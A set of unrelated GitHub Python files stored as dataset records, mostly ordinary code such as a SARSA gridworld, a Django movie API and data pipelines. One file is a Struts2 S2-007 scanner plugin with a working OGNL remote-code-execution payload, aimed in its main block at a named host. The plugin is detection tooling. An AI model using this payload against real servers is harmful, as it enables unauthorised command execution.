\"__main__\":\n #main9()\n # tasks = [\n # ((1, 1, -1), (-1, 1, -1)),\n # ((1, 1, -1), (0, -1, 0)),\n # ((1, 1, -1), (1, -1, -1)),\n # ((1, 1, 0), (-1, 0, 1)),\n # ((1, 1, -1), (0, 0, 0)),\n # ((1, 1, -1), (1, 0, -1))\n # ]\n #tasks=[((1, 1, -1), (0, 0, 0)), ((1, 1, -1), (1, 0, -1))]\n #blue_player.NextMoveClassifier.compute_signature_table()\n combine_results_simple(dirs=[r\"data\",])\n #blue_player.NextMoveClassifier.compute_signature_table()\n #pprint.pprint(pickle.load(open(\"data/complete_tasks.dat\", \"rb\")))\n #regen_status()","repo_name":"adamsd5/yavalath","sub_path":"test_blue_player.py","file_name":"test_blue_player.py","file_ext":"py","file_size_in_byte":18456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74113782567","text":"import pandas as pd\nimport numpy as np\n\nclass Categorize(dict):\n # base is classifier = {'type':'quartiles', 'breaks': 4, 'colors':colors, 'radii': radii }\n # colors = (1,1,1) if tuple then solid single\n # colors = [(1,1,1),(1,1,1)] if list and size == 2 high and low\n # colors = [(1,1,1),(1,1,1),(1,1,1),...] 
if list and size > 2 the fixed colors\n # radii = 25 if not list then single\n # radii = [minRadii,maxRadii] if list and size == 2 high and low\n def getColors(self):\n if not 'color_list' in self:\n msg = 'call catigorize before calling getColors()'\n raise AttributeError(msg)\n\n return self['color_list']\n \n def getRadii(self):\n if not 'radii_list' in self:\n msg = 'call catigorize before calling getRadii()'\n raise AttributeError(msg)\n\n return self['radii_list']\n\n def getGradient(self):\n if not 'gradient_list' in self:\n msg = 'call catigorize before calling getGradient()'\n raise AttributeError(msg)\n\n return self['gradient_list']\n\n def categorize(self,_serial):\n\n # apply colors to value_list\n #print(type(_serial))\n if isinstance(_serial,list):\n _serial = pd.Series(_serial)\n\n if not 'colors' in self:\n self['colors'] = ['b' for i in range(0,4)]\n if not 'radii' in self:\n self['radii'] = [10 for i in range(0,4)]\n if not 'gradient' in self:\n self['gradient'] = [1.0 for i in range(0, len(self['colors']))]\n\n if not 'color_list' in self:\n self['color_list']=[]\n if not 'radii_list' in self:\n self['radii_list']=[]\n if not 'gradient_list' in self:\n self['gradient_list']=[]\n\n #print(type(_serial))\n self['radii_list']=[]\n\n self['color_list']=[]\n self['gradient_list']=[]\n\n breaks = []\n if self['type'] == 'quantiles':\n\n breaks = _serial.quantile([0.25, 0.5, 0.75])\n\n color_list = []\n rad_list = []\n grd_llist = []\n for v in _serial: # values\n\n i = 0\n clr = self['colors'][len(self['colors'])-1]\n rad = self['radii'][len(self['radii'])-1]\n grd = self['gradient'][len(self['gradient']) - 1]\n\n for c in breaks:\n\n if v < c:\n #print('v: ', v , ' < ' , c , ' is ', i)\n clr = self['colors'][i]\n rad = self['radii'][i]\n grd = self['gradient'][i]\n break\n\n i += 1\n\n self['radii_list'].append(rad)\n self['color_list'].append(clr)\n self['gradient_list'].append(grd)\n\n return self\n\ndef get_gradient(values, start_gradient=0, end_gradient=1.0):\n sz = len(values)\n\n step = (end_gradient - start_gradient) / sz\n gradient = np.arange(start_gradient, end_gradient, step)\n return gradient\n\ndef test_colorize():\n import pandas as pd\n print('############# condense test')\n vals = pd.Series([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n # vals = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n\n gradient = get_gradient(vals,start_gradient=0.1)\n\n\n c_dict = {'type':'quantiles','colors':['r', 'g', 'b', 'y'],'gradient':gradient ,'alpha': 1.0 ,'radii':[10 , 25, 75, 100]}\n #c_dict = {'type': 'graduated', 'colors': ['r', 'g', 'b', 'y'],'gradient':gradient, 'alpha': 1.0, 'radii': [10, 25, 75, 100]}\n\n print('vals: ', vals)\n\n cat = Categorize(c_dict).categorize(vals)\n color = cat.getColors()\n radii = cat.getRadii()\n gradient = cat.getGradient()\n\n print('radii: ', radii)\n print('color: ', color)\n print('gradient: ', gradient)\n\ndef main():\n test_colorize()\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","repo_name":"citizenlabsgr/adopt-a-drain","sub_path":"notebook/lib/p3_Categorize.py","file_name":"p3_Categorize.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42341782192","text":"#!/usr/bin/env python3\n\nfrom app.lib.utils.common import get_capta\nfrom app.lib.utils.request import request\n\nclass S2_007_BaseVerify:\n def __init__(self, url):\n self.info = {\n 'name': 'Struts2 S2-007漏洞,又名CVE-2012-0838漏洞',\n 'description': 'Struts2 
S2-007漏洞可执行任意命令, 影响范围为: Struts 2.0.0 - Struts 2.2.3',\n 'date': '2011-09-03',\n 'type': 'RCE'\n }\n self.url = url\n self.capta = get_capta()\n self.check_payload = {\n 'name': \"1\",\n 'email': \"7777777@qq.com\",\n 'age': '''\\' + (#_memberAccess[\"allowStaticMethodAccess\"]=true,#foo=new java.lang.Boolean(\"false\") ,#context[\"xwork.MethodAccessor.denyMethodExecution\"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(''' + '\\'' +'echo ' + self.capta + '\\'' + ''').getInputStream())) + \\''''\n }\n\n def run(self):\n \"\"\"\n 检测是否存在漏洞\n\n :param:\n\n :return str True or False\n \"\"\"\n\n try:\n if not self.url.startswith(\"http\") and not self.url.startswith(\"https\"):\n self.url = \"http://\" + self.url\n if '.action' not in self.url:\n self.url = self.url + '/user.action'\n check_req = request.post(self.url, data = self.check_payload)\n if self.capta in check_req.text and check_req.status_code == 200 and len(check_req.text) < 100:\n return True\n else:\n return False\n except Exception as e:\n print(e)\n return False\n finally:\n pass\n\nif __name__ == \"__main__\":\n S2_007 = S2_007_BaseVerify('http://jsfw.kydls.com')\n S2_007.run()","repo_name":"OPSTime/linbing","sub_path":"flask/app/plugins/Struts2/S2_007.py","file_name":"S2_007.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74516055529","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom imdb_api.models.movie_model import Movie\nfrom imdb_api.serializers.movie_serializer import MovieSerializer\n\n\nclass MovieView(APIView):\n \"\"\"\n This class is used to get,add, edit and delete movies.\n \"\"\"\n authentication_classes = [TokenAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, pk=None):\n if pk is not None:\n movie = Movie.objects.get(pk=pk)\n serializer = MovieSerializer(movie)\n return Response(serializer.data)\n \n elif pk is None:\n print(request.user.username)\n movie = Movie.objects.all()\n serializer = MovieSerializer(movie, many=True)\n return Response(serializer.data)\n else:\n return Response(\"Movie not found\")\n \n def post(self, request):\n if request.user.is_authenticated and request.user.is_staff:\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n \n return Response(\"You are not authorized to add movie\")\n def put(self, request, pk):\n if request.user.is_authenticated and request.user.is_staff:\n movie = Movie.objects.get(pk=pk)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n \n else:\n return Response(\"You are not authorized to update movie\")\n def delete(self, request,pk):\n if request.user.is_authenticated and request.user.is_staff:\n movie = Movie.objects.get(pk=pk)\n movie.delete()\n return Response(\"Movie Deleted\")\n else:\n return Response(\"You are not authorized to delete 
movie\")","repo_name":"MarcinIgna/imdb-django-api","sub_path":"imdb_api/views/movie_serializer_view.py","file_name":"movie_serializer_view.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2974385432","text":"import matplotlib.pyplot as plt\r\nimport random\r\nimport sys\r\n\r\n\"\"\" PARAMETERS \"\"\"\r\n\r\n# Actions left, right, up, and down which we label via coord change.\r\nactions = [[1,0],[-1,0],[0,1],[0,-1]]\r\n\r\n# Have states in 11 x 11 grid, marked 0 to 10.\r\nstates = [[i,j] for i in range(11) for j in range(11)]\r\n\r\n# We combine actions and states into a list of pairs.\r\nstate_actions = [[state,action] for state in states for action in actions]\r\n\r\n# We set our default start and goal as the state (note these will be random)\r\nstart = [1,5]\r\ngoal = [10,5]\r\n\r\n# We set our greedy parameter and our discounting factor\r\nepsilon = 0.01\r\ngamma = .9\r\n# The below formats our walls.\r\nwalls = [[[5, 5], [5, 6], [5, 7], [5, 8], [5, 9], [5, 10]],\r\n [[7, 4], [7, 5], [7, 6], [7, 7], [7, 8], [7, 9]],\r\n [[1, 3], [1, 4], [1, 5], [1, 6], [1, 7], [1, 8]],\r\n [[9, 0], [9, 1], [9, 2], [9, 3], [9, 4], [9, 5], [9, 6], [9, 7]],\r\n [[3, 1], [3, 2], [3, 3], [3, 4], [3, 5], [3, 6], [3, 7]]]\r\n\r\nX = [2*i+1 for i in range(5)]\r\nfor elem in walls:\r\n for i in elem:\r\n states.remove(i)\r\n for a in actions:\r\n state_actions.remove([i,a])\r\n\r\n# The below loop removes any state action combinations that lead to a state \r\n# outside of our 11 x 11 grid. We then create a state-action values list which \r\n# matches this list one to one.\r\nfor i in range(5):\r\n for elem in state_actions:\r\n state = elem[0]\r\n action = elem[1]\r\n new_state = [state[0]+action[0],state[1]+action[1]]\r\n n = state_actions.index(elem)\r\n if new_state not in states:\r\n state_actions.remove(elem)\r\n\r\n# We take a copy of our state-actions pairs (useful later)\r\nrecord = [elem[0] for elem in state_actions]\r\n\r\n# We now initialise our estimates Q.\r\nS_A_values = [0 for i in range(len(state_actions))]\r\n\r\n# This function initialises our policy.\r\ndef reset_policy():\r\n policy = []\r\n for state in states:\r\n while True:\r\n action = random.choice(actions)\r\n if [action[0]+state[0],action[1]+state[1]] in states:\r\n break\r\n policy.append(action)\r\n return policy\r\n \r\npolicy = reset_policy()\r\n\r\n\"\"\" SARSA(N) IMPLEMENTATION \"\"\"\r\n\r\n# For when our agent needs to select a random action (for example exploring starts).\r\ndef random_action(state):\r\n new_state = 0\r\n while new_state not in states:\r\n action = random.choice(actions)\r\n new_state = [state[0]+action[0],state[1]+action[1]]\r\n return action\r\n\r\n# Telling our learning agent how to choose actions (using policy).\r\ndef choose_action(state):\r\n r = random.random()\r\n if r > epsilon:\r\n n = states.index(state)\r\n action = policy[n]\r\n else: \r\n action = random_action(state)\r\n return action\r\n\r\n# Reward function.\r\ndef reward(state):\r\n if state == goal:\r\n return 0\r\n else:\r\n return -1\r\n \r\n# This function improves our policy.\r\ndef improvement():\r\n record = [elem[0] for elem in state_actions]\r\n for state in states:\r\n options = []\r\n n = record.index(state)\r\n for i in range(record.count(state)):\r\n options.append(S_A_values[n+i])\r\n k = options.index(max(options))\r\n p = states.index(state)\r\n policy[p] = state_actions[n+k][1]\r\n \r\n# This is the actual iteration of 
Sarsa(n), drawing on all the other functions.\r\ndef walk(start,goal,step,alpha = 0.5):\r\n n = step\r\n S = start\r\n A = choose_action(S)\r\n S_lst = [S]\r\n A_lst = [A]\r\n R_lst = []\r\n t = 0\r\n T = 1000000\r\n tau = -1\r\n while tau != T-1:\r\n if t < T:\r\n new_S = [S[0]+A[0],S[1]+A[1]]\r\n R = reward(new_S)\r\n R_lst.append(R)\r\n S_lst.append(new_S)\r\n S = new_S\r\n if new_S == goal:\r\n T = t+1\r\n else:\r\n new_A = choose_action(new_S)\r\n A_lst.append(new_A)\r\n A = new_A\r\n tau = t - n + 1\r\n if tau >= 0:\r\n G = sum([(gamma**(i-tau-1))*R_lst[i] for i in range(tau+1,min([tau+n,T]))])\r\n if tau + n < T:\r\n k = state_actions.index([S_lst[tau+n],A_lst[tau+n]])\r\n G += (gamma**n)*S_A_values[k]\r\n p = state_actions.index([S_lst[tau],A_lst[tau]])\r\n S_A_values[p] += alpha*(G - S_A_values[p])\r\n improvement()\r\n t += 1\r\n return t\r\n\r\n# This generates a random starting state.\r\ndef starter():\r\n choices = states.copy()\r\n choices.remove(goal)\r\n return random.choice(choices)\r\n\r\n# This function essentially iterates Sarsa(n) however many times as instructed,\r\n# run(number of iterations, if you want to print all outputs, improvement plot?).\r\ndef run(n,print_,plot):\r\n x = [0]\r\n y = [0] \r\n total = 0\r\n for i in range(1,n):\r\n #walk(start,goal)\r\n #print(walk(start,goal))\r\n step = 3\r\n count = walk(starter(),goal,step)\r\n if print_:\r\n print(count)\r\n total += count\r\n x.append(total)\r\n y.append(i)\r\n if i%1000 == 0:\r\n print(i)\r\n if plot == True:\r\n plt.title(\"Episodes against timesteps for Sarsa({}): Total = {}\".format(step,total))\r\n plt.xlabel(\"Total timesteps\")\r\n plt.ylabel(\"Episodes\")\r\n plt.plot(x,y,'k-')\r\n plt.show()\r\n return total\r\n\r\n# This records our agents movements so we can plot it back later and get a nice plot.\r\ndef recorder(start,goal):\r\n S = start\r\n n = states.index(S)\r\n A = policy[n]\r\n lst = [S]\r\n i = 0\r\n while S != goal:\r\n new_S = [S[0]+A[0],S[1]+A[1]]\r\n n = states.index(new_S)\r\n new_A = policy[n]\r\n S = new_S\r\n A = new_A \r\n lst.append(S)\r\n if i > 5000:\r\n raise ValueError\r\n i += 1\r\n return lst\r\n\r\n# Making the nice plots aforementioned.\r\ndef visual(X,start):\r\n start = start\r\n if X == True:\r\n try:\r\n lst = recorder(start,goal)\r\n except:\r\n print(\"Houston, we have a problem.\")\r\n return None\r\n x = [state[0] for state in lst]\r\n y = [state[1] for state in lst]\r\n for i in range(len(lst)):\r\n plt.plot(x[i:i+2],y[i:i+2],'k-')\r\n plt.scatter(start[0],start[1],c='red',s=200)\r\n plt.scatter(goal[0],goal[1],c='green',s=200)\r\n for elem in walls:\r\n copy = elem.copy()\r\n ys = [i[1] for i in copy]\r\n if 0 in ys:\r\n copy.reverse()\r\n copy.append([copy[0][0],-1])\r\n copy.reverse()\r\n elif 10 in ys:\r\n copy.append([copy[0][0],11])\r\n plt.plot([x[0] for x in copy],[x[1] for x in copy],'k-', linewidth=3.0)\r\n plt.xticks([0,1,2,3,4,5,6,7,8,9,10])\r\n plt.yticks([0,1,2,3,4,5,6,7,8,9,10])\r\n # plt.xticks(color='w')\r\n # plt.yticks(color='w')\r\n plt.xlim(-1,11)\r\n plt.ylim(-1,11)\r\n plt.plot([-1,-1],[-1,11],'k-',linewidth=4.0)\r\n plt.plot([-1,11],[11,11],'k-',linewidth=4.0)\r\n plt.plot([11,11],[11,-1],'k-',linewidth=4.0)\r\n plt.plot([11,-1],[-1,-1],'k-',linewidth=4.0)\r\n plt.grid()\r\n plt.title(\"Optimal route\")\r\n 
plt.show()\r\n\r\n","repo_name":"toronto41/A-Study-of-Interaction","sub_path":"sarsa_n.py","file_name":"sarsa_n.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72428578409","text":"#!/usr/bin/python3.6\n\nimport os\nimport re\nimport subprocess\n\nimport logging\nfrom typing import Any, TYPE_CHECKING\nif TYPE_CHECKING:\n __salt__: Any = None\n __opts__: Any = None\nlog = logging.getLogger(__name__)\n\nBTRFS_CMD = \"/sbin/btrfs\"\nBTRFS_PKG = \"btrfsprogs\"\n\n\ndef get_btrfs_info():\n\n btrfs_info = dict()\n btrfs_info[\"btrfs\"] = {}\n \n precheck_cmd = [\"df\", \"-hTP\"]\n grep_cmd = [\"grep\", \"-E\", \"/$\"]\n regex_btrfs = r'btrfs'\n\n try:\n proc1 = subprocess.Popen(precheck_cmd, bufsize=0, stdout=subprocess.PIPE)\n proc2 = subprocess.Popen(grep_cmd, bufsize=0, stdin=proc1.stdout, stdout=subprocess.PIPE)\n for line in iter(proc2.stdout.readline, b''):\n print(line.decode('utf-8')[:-1])\n if not re.findall(regex_btrfs, line.decode('utf-8')[:-1]):\n print(\"root fs is not btrfs type.\")\n btrfs_info[\"btrfs\"][\"comment\"] = \"No btrfs, {}\".format(line.decode('utf-8')[:-1])\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"ok\"\n return btrfs_info\n \n proc2.stdout.close()\n proc2.wait()\n \n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n \n if os.path.exists(BTRFS_CMD):\n rpm_cmd = [\"rpm\", \"-q\", BTRFS_PKG]\n try:\n version = subprocess.check_output(rpm_cmd).decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n \n btrfs_info[\"btrfs\"]['version'] = version\n else:\n btrfs_info[\"btrfs\"] = \"No btrfs\"\n return btrfs_info \n \n btrfs_cmd = [\"btrfs\", \"fi\", \"usage\", \"-g\", \"/\"]\n regex = r'Free.*est'\n free_size = 0\n try:\n proc = subprocess.Popen(btrfs_cmd, bufsize=0, stdout=subprocess.PIPE)\n for line in iter(proc.stdout.readline, b''):\n log.info(line.decode('utf-8')[:-1]) # [:-1] to cut off newline char\n if re.findall(regex, line.decode('utf-8')[:-1]):\n print(line.decode('utf-8')[:-1].split()[2])\n free_size = line.decode('utf-8')[:-1].split()[2]\n free_size = float(free_size.strip(\"GiB\"))\n proc.stdout.close()\n proc.wait()\n btrfs_info[\"btrfs\"][\"root_free\"] = free_size\n btrfs_info[\"btrfs\"][\"comment\"] = \"size in GiB\"\n if free_size >= 2.00:\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"ok\"\n else:\n btrfs_info[\"btrfs\"][\"for_patching\"] = \"no\"\n \n return btrfs_info\n except subprocess.CalledProcessError as e:\n log.error(e)\n return e\n\n \"\"\" if isinstance(free_size_bytes, int):\n val = 0\n if free_size_bytes > 1024:\n print(\"kb\")\n val = free_size_bytes / 1024\n if val > 1024:\n print(\"mb\")\n val = val / 1024\n if val > 1024:\n print(\"gb\")\n val = val / 1024\n btrfs_info[\"free_size\"] = round(val) \"\"\"\n\n return btrfs_info\n\n\nif __name__ == \"__main__\":\n output = get_btrfs_info()\n for a, b in output.items():\n print(\"{}: {}\".format(a,b))","repo_name":"bjin01/salt-sap-patching","sub_path":"srv/salt/_grains/btrfs.py","file_name":"btrfs.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34425956845","text":"import gzip\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom absl import flags\nimport pandas as pd\nfrom keras.utils.data_utils import get_file\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import 
StandardScaler\n\nfrom deepray.datasets.datapipeline import DataPipeLine\n\nFLAGS = flags.FLAGS\nFLAGS([\n sys.argv[0],\n \"--num_train_examples=182280\",\n])\n\n\nclass CreditCardFraud(DataPipeLine):\n\n def __init__(self, url='https://storage.googleapis.com/download.tensorflow.org/data/creditcard.csv'):\n super().__init__()\n csv_file = tf.keras.utils.get_file('creditcard.csv', url)\n raw_df = pd.read_csv(csv_file)\n\n raw_df[['Time', 'V1', 'V2', 'V3', 'V4', 'V5', 'V26', 'V27', 'V28', 'Amount', 'Class']].describe()\n\n neg, pos = np.bincount(raw_df['Class'])\n total = neg + pos\n print('Examples:\\n Total: {}\\n Positive: {} ({:.2f}% of total)\\n'.format(total, pos, 100 * pos / total))\n\n cleaned_df = raw_df.copy()\n\n # You don't want the `Time` column.\n cleaned_df.pop('Time')\n\n # The `Amount` column covers a huge range. Convert to log-space.\n eps = 0.001 # 0 => 0.1¢\n cleaned_df['Log Amount'] = np.log(cleaned_df.pop('Amount') + eps)\n\n train_df, test_df = train_test_split(cleaned_df, test_size=0.2)\n train_df, val_df = train_test_split(train_df, test_size=0.2)\n\n # Form np arrays of labels and features.\n self.train_labels = np.array(train_df.pop('Class'))\n self.bool_train_labels = self.train_labels != 0\n self.val_labels = np.array(val_df.pop('Class'))\n self.test_labels = np.array(test_df.pop('Class'))\n\n train_features = np.array(train_df)\n val_features = np.array(val_df)\n test_features = np.array(test_df)\n\n scaler = StandardScaler()\n train_features = scaler.fit_transform(train_features)\n\n val_features = scaler.transform(val_features)\n test_features = scaler.transform(test_features)\n\n self.train_features = np.clip(train_features, -5, 5)\n self.val_features = np.clip(val_features, -5, 5)\n self.test_features = np.clip(test_features, -5, 5)\n\n self.train_df = pd.DataFrame(self.train_features, columns=train_df.columns)\n self.val_df = pd.DataFrame(self.val_features, columns=train_df.columns)\n\n def __len__(self):\n pass\n\n def build_dataset(\n self,\n input_file_pattern,\n batch_size,\n is_training=True,\n context: tf.distribute.InputContext = None,\n use_horovod=False,\n *args,\n **kwargs\n ):\n if is_training:\n ds = tf.data.Dataset.from_tensor_slices((self.train_features, self.train_labels))\n\n else:\n ds = tf.data.Dataset.from_tensor_slices((self.val_features, self.val_labels))\n ds = ds.repeat(FLAGS.epochs).shuffle(10000).batch(batch_size)\n return ds\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/creditcardfraud/creditcardfraud.py","file_name":"creditcardfraud.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"13711463941","text":"# requirements: pandas and sklearn\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndata = pd.read_csv(\"data/Team Project cleaned.csv\")\ndata_audit = data[(data.AUDIT_FEES.isna()==False)]\n\n# replace NA values in busdesc with empty string\ndata.loc[pd.isna(data.busdesc), \"busdesc\"] = \"\"\ndata_audit.loc[pd.isna(data_audit.busdesc), \"busdesc\"] = \"\"\n\n# select rows required and drop the rest\ndata_audit_text = data_audit[[\"busdesc\",\"FFI12_desc\", \"AUDIT_FEES\"]]\n\n# add FFI12_desc into the busdesc\ndata_audit_text[\"words\"] = data_audit_text[\"busdesc\"] + \" \" + data_audit_text[\"FFI12_desc\"]\ndata_audit_text = data_audit_text[[\"AUDIT_FEES\", \"words\", \"FFI12_desc\"]]\n\n# remove punctuations and numbers from the words\nwords_cleaned = []\nfor row in 
data_audit_text[\"words\"]:\n sentence_cleaned = []\n for word in row.split():\n word = word.strip(\"'/,.!@#$%^&*()-_1234567890=+[]\\{\\}\\|\\\";:> 0.0001 for v in [c_diff, d_diff, dc_da_diff, dc_db_diff, dd_da_diff, dd_db_diff]]):\n print(\"FAILED (matmul) :(\")\n else:\n print(\"PASSED (matmul) :)\")\n\n\ndef check_mse():\n n = 32\n\n with tf.GradientTape(persistent=True) as t:\n y_true = tf.get_variable(dtype=tf.float32, shape=(n,), name='y_true')\n y_pred = tf.get_variable(dtype=tf.float32, shape=(n,), name='y_pred')\n\n tf_c = tf.reduce_mean(tf.math.squared_difference(y_true, y_pred))\n my_c = mse_tf(y_true, y_pred)\n\n tf_d = tf.exp(tf_c, 3)\n my_d = tf.exp(my_c, 3)\n\n tf_dc_da, tf_dc_db = t.gradient(tf_c, [y_true, y_pred])\n my_dc_da, my_dc_db = t.gradient(my_c, [y_true, y_pred])\n\n tf_dd_da, tf_dd_db = t.gradient(tf_d, [y_true, y_pred])\n my_dd_da, my_dd_db = t.gradient(my_d, [y_true, y_pred])\n\n c_diff = np.max(np.abs(tf_c.numpy() - my_c.numpy()))\n d_diff = np.max(np.abs(tf_d.numpy() - my_d.numpy()))\n dc_da_diff = np.max(np.abs(tf_dc_da.numpy() - my_dc_da.numpy()))\n dc_db_diff = np.max(np.abs(tf_dc_db.numpy() - my_dc_db.numpy()))\n dd_da_diff = np.max(np.abs(tf_dd_da.numpy() - my_dd_da.numpy()))\n dd_db_diff = np.max(np.abs(tf_dd_db.numpy() - my_dd_db.numpy()))\n\n if any([v > 0.0001 for v in [c_diff, d_diff, dc_da_diff, dc_db_diff, dd_da_diff, dd_db_diff]]):\n print(\"FAILED (mse) :(\")\n else:\n print(\"PASSED (mse) :)\")\n\n\nif __name__ == '__main__':\n tf.enable_eager_execution()\n tf.set_random_seed(311602536)\n\n check_matmul()\n check_mse()\n\n X, y = load_data()\n losses = train(epochs=50, learning_rate=0.01, batch_size=32)\n\n","repo_name":"AlonNT/APML","sub_path":"ex1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73385520807","text":"# Program: Deret Karakter\n# Tuliskan program yang membaca sebuah karakter C dan sebuah integer N,\n# kemudian menuliskan dalam satu baris, karakter C sebanyak N. 
Asumsikan N > 0.\n\n# KAMUS\n# C = string\n# N = int\n# i = int\n\n# ALGORITMA\n\nC = str(input())[0]\nN = int(input())\n\nfor i in range(N):\n print(C,end='')\nprint()","repo_name":"zshnrg/Praktikum-Daspro-STEI-2022","sub_path":"Praktikum 3/Soal 3/deretkarakter.py","file_name":"deretkarakter.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14371264514","text":"from dffw_msgs.msg import *\nfrom dffw_msgs.srv import *\nfrom dffw.dataconvert import *\nfrom dffw.common import *\nimport json\nfrom rclpy.node import Node\nimport os\n\nSERVER_NAME = 'server_'\nMODEL_WEIGHT_ROOT_PATH = '/root/weight'\ndef create_layer(layer_info):\n args = layer_info['args']\n module = layer_info['module']\n inp = ', '.join(map(str,args))\n return eval(f'{module}({inp})')\n\nclass LayerRunner(object):\n def __init__(self, node,\n layer_info, \n is_cuda=False,\n load_weight=False):\n self.node = node\n self.layer_info = json.loads(layer_info)\n self.save_path = f\"{MODEL_WEIGHT_ROOT_PATH}/{self.layer_info['model_name']}/{self.layer_info['layer_id']}/{self.layer_info['module']}.pth\"\n self.layer = create_layer(self.layer_info)\n self.load_weight = load_weight\n self.is_cuda = is_cuda\n if self.is_cuda:\n self.layer = self.layer.cuda()\n if os.path.exists(self.save_path):\n if self.load_weight:\n self.layer.load_state_dict(torch.load(self.save_path))\n else:\n if not os.path.isdir(os.path.dirname(self.save_path)):\n os.makedirs(os.path.dirname(self.save_path))\n\n self.epochs = self.layer_info['epochs']\n self.train_type = self.layer_info['train_type']\n self.Tsub = self.node.create_subscription(\n eval(self.layer_info['trainInp']['type'][0]),\n self.layer_info['trainInp']['name'][0],\n self.traincallback,\n 10)\n \n self.Tpub = self.node.create_publisher(\n eval(self.layer_info['trainOut']['type'][0]), \n self.layer_info['trainOut']['name'][0], \n 10)\n self.Fsub = self.node.create_subscription(\n eval(self.layer_info['inferenceInp']['type'][0]),\n self.layer_info['inferenceInp']['name'][0],\n self.forwardcallback,\n 10)\n self.Fpub = self.node.create_publisher(\n eval(self.layer_info['inferenceOut']['type'][0]), \n self.layer_info['inferenceOut']['name'][0],\n 10)\n \n def model_name(self):\n return self.layer_info['model_name']\n \n def traincallback(self, msg):\n h_pos, h_neg = TFmsg2tensor(msg) #TBD: change to a universal method\n if self.is_cuda:\n h_pos = h_pos.cuda()\n h_neg = h_neg.cuda()\n self.layer.train()\n print(self.train_type)\n h_pos, h_neg = self.layer.train_ff(h_pos, h_neg, \n self.epochs, self.train_type)\n msg = TrainForward()\n msg = TFtensor2msg(h_pos, h_neg) #TBD: change to a universal method\n self.Tpub.publish(msg)\n self.save()\n \n def forwardcallback(self, msg):\n h,_ = IFmsg2tensor(msg) #TBD: change to a universal method\n if self.is_cuda:\n h = h.cuda()\n self.layer.eval()\n h = self.layer.forward_ff(h)\n goodness = h.pow(2).mean(1)\n if self.is_cuda:\n h = h.cpu()\n goodness = goodness.cpu()\n msg = InferanceForward()\n msg = IFtensor2msg(h, goodness) #TBD: change to a universal method\n self.Fpub.publish(msg)\n\n\n def save(self):\n torch.save(self.layer.state_dict(), self.save_path)\n # save weight to local TBD: to master\n\n def destroy(self):\n try:\n self.node.destroy_subscription(self.Tsub)\n self.node.destroy_subscription(self.Fsub)\n self.node.destroy_publisher(self.Tpub)\n self.node.destroy_publisher(self.Fpub)\n del self.layer\n except Exception as e:\n 
print(e)\n\nclass ServerNode(Node):\n def __init__(self, server_name=SERVER_NAME,\n is_cuda = False,\n load_weight = False\n ):\n super().__init__(server_name)\n self.layer_runners = []\n self.is_cuda = is_cuda\n self.load_weight = load_weight\n self.create_sevice = self.create_service(\n Str, \n f'{self.get_name()}/create_layer', \n self.create_service_callback\n )\n self.delete_sevice = self.create_service(\n Str, \n f'{self.get_name()}/delete_layer', \n self.delete_service_callback\n )\n self.get_logger().info('Server Successfully Created!')\n\n def create_service_callback(self, request, response):\n self.get_logger().info('create_service_callback called!')\n response.msg = f'failed|'\n if request.msg:\n # try:\n layer_info = request.msg\n layer_runner = LayerRunner(self, \n layer_info,\n self.is_cuda,\n self.load_weight\n )\n self.layer_runners.append({'model_name':layer_runner.model_name(),\n 'layer_runner': layer_runner})\n response.msg = f'success|{layer_info}'\n self.get_logger().info(f'{layer_runner.layer_info[\"model_name\"]}/{layer_runner.layer_info[\"module\"]}/{layer_runner.layer_info[\"args\"]} created!')\n return response\n # except Exception as e:\n # response.msg = f'fail|{layer_info}|{e}'\n # return response\n \n\n def delete_service_callback(self, request, response):\n self.get_logger().info('delete_service_callback called!')\n response.msg = f'failed|'\n if request.msg:\n try:\n delete_model_name = request.msg\n for l in self.layer_runners:\n if delete_model_name == l['model_name']:\n runner = l['layer_runner']\n runner.destroy()\n self.layer_runners.remove(l)\n response.msg = f'success|{delete_model_name}'\n self.get_logger().info(f'{delete_model_name} deleted!')\n return response\n except Exception as e:\n response.msg = f'failed|{delete_model_name}|e'\n self.get_logger().info(f'{delete_model_name} delete failed!')\n return response\n 